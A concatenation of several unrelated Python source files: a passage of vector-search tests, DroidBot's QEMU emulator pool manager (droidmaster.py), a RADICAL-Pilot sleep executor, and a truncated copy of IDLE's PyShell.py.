default_search_exp,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
log.info("Test case of search interface: test_search_expression_all_data_type")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, is_all_data_type=True)
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, search_exp,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})[0]
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
log.info("Test case of search interface: test_search_multi_collections")
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
# 2. search
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, default_nq, collection_w.name))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self):
"""
target: test concurrent search with multi-processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
log.info("Test case of search interface: test_search_concurrent_multi_threads")
threads_num = 10
threads = []
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)
def search(collection_w):
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
log.info("test_search_concurrent_multi_threads: searched with %s processes" % threads_num)
|
droidmaster.py
|
# This file contains the main class of droidbot
# It can be used after AVD was started, app was installed, and adb had been set up properly
# By configuring and creating a droidbot instance,
# droidbot will start interacting with Android in AVD like a human
import logging
import os
import sys
import pkg_resources
import shutil
import subprocess
import xmlrpclib
from threading import Timer
from SimpleXMLRPCServer import SimpleXMLRPCServer
from device import Device
from adapter.droidbot import DroidBotConn
from adapter.qemu import QEMUConn
from app import App
from env_manager import AppEnvManager
from input_manager import InputManager
class DroidMaster(object):
"""
The main class of droidmaster
DroidMaster currently supports QEMU instance pool only
"""
# this is a single instance class
instance = None
def __init__(self,
app_path=None,
device_serial=None,
is_emulator=False,
output_dir=None,
env_policy=None,
policy_name=None,
random_input=False,
script_path=None,
event_count=None,
event_interval=None,
timeout=None,
keep_app=None,
keep_env=False,
cv_mode=False,
debug_mode=False,
profiling_method=None,
grant_perm=False,
enable_accessibility_hard=False,
qemu_hda=None,
qemu_no_graphic=False):
"""
initiate droidmaster, and
initiate droidbot's with configurations
:return:
"""
logging.basicConfig(level=logging.DEBUG if debug_mode else logging.INFO)
self.logger = logging.getLogger('DroidMaster')
DroidMaster.instance = self
# 1. Save DroidBot Parameters
self.app_path=app_path
self.device_serial=device_serial
self.is_emulator=is_emulator
self.output_dir=output_dir
os.makedirs(self.output_dir)
self.env_policy=env_policy
self.policy_name=policy_name
self.random_input=random_input
self.script_path=script_path
self.event_count=event_count
self.event_interval=event_interval
self.timeout=timeout
self.keep_app=keep_app
self.keep_env=keep_env
self.cv_mode=cv_mode
self.debug_mode=debug_mode
self.profiling_method=profiling_method
self.grant_perm=grant_perm
self.enable_accessibility_hard=enable_accessibility_hard
# 2. Initiate Device Pool
# {"adb_target": {"pid": pid, }}
self.domain = "localhost"
self.adb_default_port = 4444
self.qemu_default_port = 5555
self.rpc_port = 6666
self.qemu_hda = qemu_hda
self.qemu_no_graphic = qemu_no_graphic
self.device_pool_capacity = 6
self.device_pool = {}
self.device_unique_id = 0
for port_offset in range(self.device_pool_capacity):
adb_port = self.adb_default_port + port_offset
adb_target = "%s:%s" % (self.domain, adb_port)
qemu_port = self.qemu_default_port + port_offset
self.device_pool[adb_target] = {
"domain": self.domain,
"adb_port": adb_port,
"qemu_port": qemu_port,
# droidbot is indexed by adb_target
# qemu is indexed by droidbot
"droidbot": None,
"qemu": None,
"id": None
}
self.logger.info(self.device_pool)
# 2. This Server's Parameter
self.timer = None
self.enabled = True
self.successful_spawn_events = set()
@staticmethod
def get_instance():
if DroidMaster.instance is None:
print "Error: DroidMaster is not initiated!"
sys.exit(-1)
return DroidMaster.instance
def get_available_devices(self):
return sorted([self.device_pool[x]
for x in self.device_pool
if self.device_pool[x]["qemu"] is None])
def get_running_devices(self):
return sorted([self.device_pool[x]
for x in self.device_pool
if self.device_pool[x]["qemu"] is not None])
def start_device(self, device, hda_path, from_snapshot=False, init_script_path=None):
# 1. get device ID
device["id"] = self.device_unique_id
# 2. new QEMU adapter
device["qemu"] = QEMUConn(hda_path, device["qemu_port"], device["adb_port"],
self.qemu_no_graphic)
device["qemu"].set_up()
device["qemu"].connect(from_snapshot)
# 3. new DroidWorker adapter
script_path = init_script_path if init_script_path else self.script_path
device["droidbot"] = DroidBotConn(device["id"],
app_path=self.app_path,
device_serial="%s:%d" % \
(self.domain, device["adb_port"]),
is_emulator=self.is_emulator,
output_dir=self.output_dir,
env_policy=self.env_policy,
policy_name=self.policy_name,
random_input=self.random_input,
script_path=script_path,
event_count=self.event_count,
event_interval=self.event_interval,
timeout=self.timeout,
keep_app=self.keep_app,
keep_env=self.keep_env,
cv_mode=self.cv_mode,
debug_mode=self.debug_mode,
profiling_method=self.profiling_method,
grant_perm=self.grant_perm,
enable_accessibility_hard=self.enable_accessibility_hard,
master="http://%s:%d/" % \
(self.domain, self.rpc_port))
device["droidbot"].set_up()
self.logger.info("Worker: DOMAIN[%s], ADB[%s], QEMU[%d], ID[%d]" % \
(device["domain"], device["adb_port"],
device["qemu_port"], device["id"]))
self.device_unique_id += 1
def stop_device(self, device):
device["droidbot"].tear_down()
device["droidbot"].disconnect()
device["droidbot"] = None
device["qemu"].disconnect()
device["qemu"].tear_down()
device["qemu"] = None
def spawn(self, adb_target, init_script_json):
"""
A worker requests to spawn a new worker
based on its current state
"""
if init_script_json in self.successful_spawn_events:
self.logger.warning("Event spawned already")
return False
device = self.device_pool[adb_target]
device["qemu"].send_command("stop")
device["qemu"].send_command("savevm spawn")
# copy qemu image file (almost RAM image size only)
new_hda_path = "%s.%d" % (device["qemu"].hda_path, \
self.device_unique_id)
shutil.copyfile(device["qemu"].hda_path, new_hda_path)
# prepare init script file
import json
init_script_path = "%s%s%d.json" % (self.output_dir, os.path.sep,
self.device_unique_id)
with open(init_script_path, "w") as init_script_file:
init_script_file.write(init_script_json)
available_devices = self.get_available_devices()
if not len(available_devices):
self.logger.warning("No available device slot")
return False
self.start_device(available_devices[0], new_hda_path,
from_snapshot=True, init_script_path=init_script_path)
device["qemu"].send_command("delvm spawn")
device["qemu"].send_command("cont")
self.successful_spawn_events.add(init_script_json)
self.logger.info("Spawning worker")
return True
def start_worker(self):
"""
Start the first worker, used by DroidMaster itself
"""
# copy qemu image file
new_hda_path = "%s.%d" % (self.qemu_hda, \
self.device_unique_id)
# generate incremental snapshot only
p = subprocess.Popen(["qemu-img", "create", "-f", "qcow2", new_hda_path,
"-o", "backing_file=%s" % self.qemu_hda, "8G"])
p.wait()
available_devices = self.get_available_devices()
if not len(available_devices):
self.logger.warning("No available device slot")
return False
self.start_device(available_devices[0], new_hda_path)
return True
def start_daemon(self):
self.server = SimpleXMLRPCServer((self.domain, self.rpc_port))
print "Listening on port %s..." % self.rpc_port
self.server.register_function(self.spawn, "spawn")
self.server.register_function(self.start_worker, "start_worker")
self.server.serve_forever()
def stop_daemon(self):
print "Shutting down DroidMaster server..."
self.server.shutdown()
self.server_thread.join(0)
def start(self):
"""
start interacting
:return:
"""
if not self.enabled:
return
self.logger.info("Starting DroidMaster")
try:
if self.timeout > 0:
self.timer = Timer(self.timeout, self.stop)
self.timer.start()
if not self.enabled:
return
# enable server listening workers
import time
import threading
self.server_thread = threading.Thread(target=self.start_daemon)
self.server_thread.daemon = True
self.server_thread.start()
time.sleep(1) # wait server to start
# create first droidbot instance
proxy = xmlrpclib.ServerProxy("http://%s:%d/" % (self.domain, self.rpc_port))
proxy.start_worker()
while len(self.get_running_devices()):
time.sleep(1)
except KeyboardInterrupt:
self.logger.info("Keyboard interrupt.")
pass
except Exception as e:
self.logger.warning("Something went wrong: " + e.message)
import traceback
traceback.print_exc()
self.stop()
sys.exit(-1)
self.stop()
self.logger.info("DroidMaster Stopped")
def stop(self):
self.enabled = False
if self.timer and self.timer.isAlive():
self.timer.cancel()
# stop listening server
self.stop_daemon()
# stop all workers
running_devices = self.get_running_devices()
for device in running_devices:
self.stop_device(device)
class DroidMasterException(Exception):
pass
|
sleep.py
|
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import time
import threading as mt
import radical.utils as ru
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ------------------------------------------------------------------------------
#
class Sleep(AgentExecutingComponent) :
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
AgentExecutingComponent.__init__ (self, cfg, session)
# --------------------------------------------------------------------------
#
def initialize(self):
self._pwd = os.getcwd()
self.register_input(rps.AGENT_EXECUTING_PENDING,
rpc.AGENT_EXECUTING_QUEUE, self.work)
self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
rpc.AGENT_STAGING_OUTPUT_QUEUE)
self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
self._terminate = mt.Event()
self._tasks_lock = ru.RLock()
self._tasks = list()
self._delay = 0.1
self._watcher = mt.Thread(target=self._timed)
self._watcher.daemon = True
self._watcher.start()
# --------------------------------------------------------------------------
#
def finalize(self):
self._terminate.set()
self._watcher.join()
# --------------------------------------------------------------------------
#
def work(self, tasks):
self.advance(tasks, rps.AGENT_EXECUTING, publish=True, push=False)
for task in tasks:
try:
self._handle_task(task)
except Exception:
# append the startup error to the tasks stderr. This is
# not completely correct (as this text is not produced
# by the task), but it seems the most intuitive way to
# communicate that error to the application/user.
self._log.exception("error running Task")
if task['stderr'] is None:
task['stderr'] = ''
task['stderr'] += '\nPilot cannot start task:\n'
task['stderr'] += '\n'.join(ru.get_exception_trace())
# can't rely on the executor base to free the task resources
self._prof.prof('unschedule_start', uid=task['uid'])
self.publish(rpc.AGENT_UNSCHEDULE_PUBSUB, task)
self.advance(task, rps.FAILED, publish=True, push=False)
with self._tasks_lock:
self._tasks.extend(tasks)
# --------------------------------------------------------------------------
#
def _handle_task(self, task):
now = time.time()
# assert(t['description']['executable'].endswith('sleep'))
task['to_finish'] = now + float(task['description']['arguments'][0])
uid = task['uid']
self._prof.prof('exec_start', uid=uid)
self._prof.prof('exec_ok', uid=uid)
self._prof.prof('task_start', uid=uid)
self._prof.prof('task_exec_start', uid=uid)
self._prof.prof('app_start', uid=uid)
# --------------------------------------------------------------------------
#
def _timed(self):
while not self._terminate.is_set():
time.sleep(self._delay)
with self._tasks_lock:
now = time.time()
to_finish = [t for t in self._tasks if t['to_finish'] <= now]
self._tasks = [t for t in self._tasks if t['to_finish'] > now]
for task in to_finish:
uid = task['uid']
task['target_state'] = 'DONE'
self._prof.prof('app_stop', uid=uid)
self._prof.prof('task_exec_stop', uid=uid)
self._prof.prof('task_stop', uid=uid)
self._prof.prof('exec_stop', uid=uid)
self._prof.prof('unschedule_start', uid=uid)
self.publish(rpc.AGENT_UNSCHEDULE_PUBSUB, task)
self.advance(to_finish, rps.AGENT_STAGING_OUTPUT_PENDING,
publish=True, push=True)
# ------------------------------------------------------------------------------
|
PyShell.py
|
#! /usr/bin/env python
import os
import os.path
import sys
import string
import getopt
import re
import socket
import time
import threading
import traceback
import types
import macosxSupport
import linecache
from code import InteractiveInterpreter
try:
from Tkinter import *
except ImportError:
print>>sys.__stderr__, "** IDLE can't import Tkinter. " \
"Your Python may not be configured for Tk. **"
sys.exit(1)
import tkMessageBox
from EditorWindow import EditorWindow, fixwordbreaks
from FileList import FileList
from ColorDelegator import ColorDelegator
from UndoDelegator import UndoDelegator
from OutputWindow import OutputWindow
from configHandler import idleConf
import idlever
import rpc
import Debugger
import RemoteDebugger
IDENTCHARS = string.ascii_letters + string.digits + "_"
LOCALHOST = '127.0.0.1'
try:
from signal import SIGTERM
except ImportError:
SIGTERM = 15
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
global warning_stream
warning_stream = sys.__stderr__
try:
import warnings
except ImportError:
pass
else:
def idle_showwarning(message, category, filename, lineno):
file = warning_stream
try:
file.write(warnings.formatwarning(message, category, filename, lineno))
except IOError:
pass ## file (probably __stderr__) is invalid, warning dropped.
warnings.showwarning = idle_showwarning
def idle_formatwarning(message, category, filename, lineno):
"""Format warnings the IDLE way"""
s = "\nWarning (from warnings module):\n"
s += ' File \"%s\", line %s\n' % (filename, lineno)
line = linecache.getline(filename, lineno).strip()
if line:
s += " %s\n" % line
s += "%s: %s\n>>> " % (category.__name__, message)
return s
warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(which destroys them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for filename in cache.keys():
if filename[:1] + filename[-1:] == '<>':
save[filename] = cache[filename]
orig_checkcache()
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [("Set Breakpoint", "<<set-breakpoint-here>>"),
("Clear Breakpoint", "<<clear-breakpoint-here>>")]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exceptiopn. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
